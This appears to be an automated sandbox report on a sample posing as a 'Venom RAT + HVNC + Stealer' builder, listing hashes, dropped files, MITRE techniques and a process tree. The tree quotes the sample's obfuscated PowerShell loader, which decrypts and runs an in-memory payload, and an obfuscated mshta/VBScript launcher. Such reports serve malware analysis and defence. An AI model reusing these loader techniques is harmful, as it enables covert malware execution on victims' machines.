asyncrat | 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5

General

Target

VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Size

26.1MB
MD5

a8776c9984c7b6c4f18bf0505ca939b5
SHA1

e23a41b6f03f11d3b6a64d5645fa102f373bd292
SHA256

5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
SHA512

9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
SSDEEP

786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC

Score

10^/10

asyncrat rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	$sxr-mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
884	Venom RAT + HVNC + Stealer + Grabber.exe
1380	$sxr-mshta.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	$sxr-mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4660 wrote to memory of 1440	4660	Venom RAT + HVNC + Stealer + Grabber.exe	74
PID 4660 wrote to memory of 1440	4660	Venom RAT + HVNC + Stealer + Grabber.exe	74
PID 4660 wrote to memory of 884	4660	Venom RAT + HVNC + Stealer + Grabber.exe	76
PID 4660 wrote to memory of 884	4660	Venom RAT + HVNC + Stealer + Grabber.exe	76
PID 1440 wrote to memory of 1992	1440	cmd.exe	79
PID 1440 wrote to memory of 1992	1440	cmd.exe	79
PID 1440 wrote to memory of 4592	1440	cmd.exe	80
PID 1440 wrote to memory of 4592	1440	cmd.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe
"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "
    3⤵
    PID:1992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4592
- C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe
  "C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"
  2⤵
  - Executes dropped EXE
  PID:884

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fcYQxVhvEiaGdINTAJQc4312:JJRWgfrr=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:1380
- C:\Windows\$sxr-cmd.exe
  "C:\Windows\$sxr-cmd.exe" /c %$sxr-fcYQxVhvEiaGdINTAJQc4312:JJRWgfrr=%
  2⤵
  PID:3256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Venom RAT + HVNC + Stealer + Grabber.exe.log

Filesize
654B

MD5
16c5fce5f7230eea11598ec11ed42862

SHA1
75392d4824706090f5e8907eee1059349c927600

SHA256
87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

SHA512
153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xefsshr.jwv.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

Filesize
14.2MB

MD5
3b3a304c6fc7a3a1d9390d7cbff56634

SHA1
e8bd5244e6362968f5017680da33f1e90ae63dd7

SHA256
7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58

SHA512
7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

Download Submit
C:\Users\Admin\AppData\Roaming\Venom.bat

Filesize
11.9MB

MD5
04fd97b8a5d2132eee84f856ee0fa938

SHA1
0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a

SHA256
bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49

SHA512
e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
265KB

MD5
94912c1d73ade68f2486ed4d8ea82de6

SHA1
524ab0a40594d2b5f620f542e87a45472979a416

SHA256
9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

SHA512
f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
memory/884-15-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

Filesize
9.9MB

Download
memory/884-82-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

Filesize
9.9MB

Download
memory/884-16-0x0000012A58AF0000-0x0000012A59924000-memory.dmp

Filesize
14.2MB

Download
memory/4592-79-0x00007FFF22F60000-0x00007FFF2300E000-memory.dmp

Filesize
696KB

Download
memory/4592-103-0x000002031C7C0000-0x000002031C818000-memory.dmp

Filesize
352KB

Download
memory/4592-21-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

Filesize
9.9MB

Download
memory/4592-24-0x000002031B610000-0x000002031B632000-memory.dmp

Filesize
136KB

Download
memory/4592-23-0x000002031B460000-0x000002031B470000-memory.dmp

Filesize
64KB

Download
memory/4592-53-0x000002031B7B0000-0x000002031B7EC000-memory.dmp

Filesize
240KB

Download
memory/4592-64-0x000002031BC20000-0x000002031BC96000-memory.dmp

Filesize
472KB

Download
memory/4592-73-0x000002031B460000-0x000002031B470000-memory.dmp

Filesize
64KB

Download
memory/4592-74-0x0000020364210000-0x0000020364AA8000-memory.dmp

Filesize
8.6MB

Download
memory/4592-359-0x000002031B460000-0x000002031B470000-memory.dmp

Filesize
64KB

Download
memory/4592-80-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

Filesize
1.9MB

Download
memory/4592-81-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

Filesize
1.9MB

Download
memory/4592-83-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

Filesize
1.9MB

Download
memory/4592-251-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/4592-84-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

Filesize
9.9MB

Download
memory/4592-85-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

Filesize
1.9MB

Download
memory/4592-86-0x000002031BCA0000-0x000002031C76A000-memory.dmp

Filesize
10.8MB

Download
memory/4592-87-0x000002031B850000-0x000002031B8EA000-memory.dmp

Filesize
616KB

Download
memory/4592-102-0x000002031C770000-0x000002031C7C2000-memory.dmp

Filesize
328KB

Download
memory/4592-22-0x000002031B460000-0x000002031B470000-memory.dmp

Filesize
64KB

Download
memory/4592-104-0x000002031B780000-0x000002031B7AE000-memory.dmp

Filesize
184KB

Download
memory/4592-119-0x000002031B460000-0x000002031B470000-memory.dmp

Filesize
64KB

Download
memory/4592-247-0x000002031B2C0000-0x000002031B2C8000-memory.dmp

Filesize
32KB

Download
memory/4660-14-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

Filesize
9.9MB

Download
memory/4660-2-0x000000001CBF0000-0x000000001CC00000-memory.dmp

Filesize
64KB

Download
memory/4660-0-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

Filesize
9.9MB

Download
memory/4660-1-0x0000000000630000-0x000000000205A000-memory.dmp

Filesize
26.2MB

Download

Resubmissions

Analysis

Sharing